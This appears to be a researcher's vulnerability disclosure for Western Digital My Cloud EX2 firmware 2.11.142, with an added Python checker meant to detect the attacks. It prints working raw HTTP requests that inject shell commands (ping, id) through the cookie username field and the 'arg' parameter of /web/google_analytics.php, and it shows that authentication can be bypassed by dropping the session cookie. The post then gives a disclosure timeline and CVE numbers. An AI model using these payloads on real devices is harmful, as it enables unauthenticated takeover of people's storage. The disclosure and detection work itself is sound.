The software version of my device is 2.11.142 and my device says that it’s up to date.
The first command injection vulnerability is in the Cookie header of the home page URL, “/” (index.php). To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1
I deleted the PHPSESSID from the cookie and it still worked without any authentication.
The next one was in the /web/google_analytics.php URL.
POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close

cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23
I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
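As an added example (not from the original post or the vendor), here is a small Python checker that parses raw requests in the form shown above and flags the two things a defender would want to alert on: shell metacharacters in the cookie `username` or form `arg` values, and a client asserting `isAdmin=1` without any `PHPSESSID`. The sample requests are constructed, modelled on the two injection points described above.

```python
import re
from urllib.parse import parse_qsl, unquote

# Shell metacharacters that have no business in a NAS username or a numeric setting.
SHELL_META = re.compile(r"[|;&`$\n]")

# Constructed sample requests: two modelled on the injection points above, one benign.
SAMPLES = [
    "GET / HTTP/1.1\r\nHost: wdmycloudex2\r\n"
    "Cookie: isAdmin=1; username=admin|echo%20`id`; local_login=1\r\n\r\n",
    "POST /web/google_analytics.php HTTP/1.1\r\nHost: wdmycloudex2\r\n"
    "Cookie: isAdmin=1; username=admin; local_login=1\r\n\r\n"
    "cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23",
    "POST /web/google_analytics.php HTTP/1.1\r\nHost: wdmycloudex2\r\n"
    "Cookie: PHPSESSID=abc123; username=admin\r\n\r\n"
    "cmd=set&opt=cloud-device-num&arg=0",
]

def parse_request(raw):
    """Split a raw HTTP request into (method, path, cookies, form params)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        k, _, v = part.strip().partition("=")
        if k:
            cookies[k] = unquote(v)  # decode %20 etc. before inspecting
    params = dict(parse_qsl(body, keep_blank_values=True))
    return method, path, cookies, params

def findings(raw):
    """Return a list of human-readable alerts for one request (empty if clean)."""
    method, path, cookies, params = parse_request(raw)
    out = []
    for source, kv in (("cookie", cookies), ("param", params)):
        for k, v in kv.items():
            if SHELL_META.search(v):
                out.append(f"{source} {k!r} contains shell metacharacters: {v!r}")
    # The device trusted isAdmin=1 with no server-side session; flag that combination.
    if cookies.get("isAdmin") == "1" and "PHPSESSID" not in cookies:
        out.append(f"{method} {path}: isAdmin=1 asserted without a PHPSESSID")
    return out

if __name__ == "__main__":
    for sample in SAMPLES:
        print(findings(sample) or ["clean"])
```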
I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.
Update 1/3/2017: Mitre assigned CVEs CVE-2016-10107 and CVE-2016-10108.
Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.